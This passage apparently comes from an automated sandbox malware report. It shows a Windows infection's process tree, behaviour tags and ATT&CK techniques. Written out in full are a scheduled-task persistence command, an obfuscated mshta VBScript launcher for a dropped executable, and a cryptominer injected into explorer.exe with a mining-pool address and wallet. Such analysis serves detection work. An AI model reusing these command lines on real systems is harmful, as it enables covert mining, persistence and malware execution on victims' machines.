- Adds Run key to start application
PID:3376

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6304

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x174,0x210,0x7ff8f582dec0,0x7ff8f582ded0,0x7ff8f582dee0
11⤵
- Loads dropped DLL
PID:4860

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff6b1f99e70,0x7ff6b1f99e80,0x7ff6b1f99e90
12⤵
- Loads dropped DLL
PID:6264

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=2288 /prefetch:8
11⤵
PID:3204

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=1788 /prefetch:8
11⤵
PID:1708

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
11⤵
- Loads dropped DLL
- Modifies registry class
PID:1520

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
11⤵
PID:3424

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2624 /prefetch:1
11⤵
PID:4712

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=3120 /prefetch:8
11⤵
PID:7380

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:2
11⤵
- Modifies registry class
PID:7624

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=860 /prefetch:8
11⤵
PID:8644

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=3428 /prefetch:8
11⤵
PID:8792

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=3364 /prefetch:8
11⤵
PID:9592

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,9751263558912571461,3557216411243547826,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6304_185876037" --mojo-platform-channel-handle=2140 /prefetch:8
11⤵
PID:10008

C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
8⤵
PID:6600

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6600 -s 2268
9⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4000

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:6444

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
9⤵
PID:436

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
PID:4984

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
- Creates scheduled task(s)
PID:4060

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
PID:6964

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
11⤵
PID:2036

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
12⤵
- Suspicious use of SetThreadContext
PID:6452

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
13⤵
PID:5776

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
14⤵
PID:5372

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
13⤵
- Drops file in Program Files directory
PID:2132

C:\Program Files (x86)\Ilvolgj8p\colorcpl6lwt3l.exe
"C:\Program Files (x86)\Ilvolgj8p\colorcpl6lwt3l.exe"
14⤵
PID:10872

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
- Enumerates system info in registry
PID:796

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
PID:6016

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\Pictures\Adobe Films\2AdEKiwtmbqyhsj6CH0d8OOg.exe"
3⤵
PID:6776

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
1⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f
2⤵
PID:1516

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3064

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5704 -s 452
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5704 -ip 5704
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4776 -ip 4776
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4244 -ip 4244
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5472 -ip 5472
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4604

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 6088 -ip 6088
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5836 -ip 5836
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 3992 -ip 3992
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:7080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 1648 -ip 1648
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6804

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6252

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:6628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 456
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6628 -ip 6628
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2088

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 6600 -ip 6600
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5968 -ip 5968
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5520 -ip 5520
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5924 -ip 5924
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5876 -ip 5876
1⤵
PID:6500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 5708 -ip 5708
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 5616 -ip 5616
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5948 -ip 5948
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 5628 -ip 5628
1⤵
PID:6932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 5588 -ip 5588
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 6364 -ip 6364
1⤵
PID:1760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 2424 -ip 2424
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5160 -ip 5160
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 1588 -ip 1588
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3548

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2872

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:7152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7152 -s 456
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 7152 -ip 7152
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1760

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5872

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9C6F69DA252E616DA1AA80A6E26E3A9E C
2⤵
- Loads dropped DLL
PID:2608

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding BE238E962519733ADD096258A41312D0
2⤵
- Blocklisted process makes network request
PID:7596

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:7860

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C8500401AEDB8E710F3ED92E4D32ED4B E Global\MSI0000
2⤵
- Drops file in Windows directory
PID:8348

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3932

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
- Loads dropped DLL
PID:6236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 452
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6236 -ip 6236
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 6484 -ip 6484
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 6092 -ip 6092
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:12112

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:12412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:12856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:13108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:23040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:29120

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B80478F7DF1BA6C93A38CD169F7FD851 C
2⤵
PID:29292

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AEB6CB68BC6477E81BA12AE55980D61B
2⤵
- Blocklisted process makes network request
PID:29712

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
3⤵
- Kills process with taskkill
PID:29792

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 9C5968421102C0FA0A24500F13EA3543 E Global\MSI0000
2⤵
- Drops file in Windows directory
PID:29976

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:29388

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:29400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 29400 -s 440
3⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:29544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 29400 -ip 29400
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:29484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 28800 -ip 28800
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:29500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 28976 -ip 28976
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:29628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:32188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery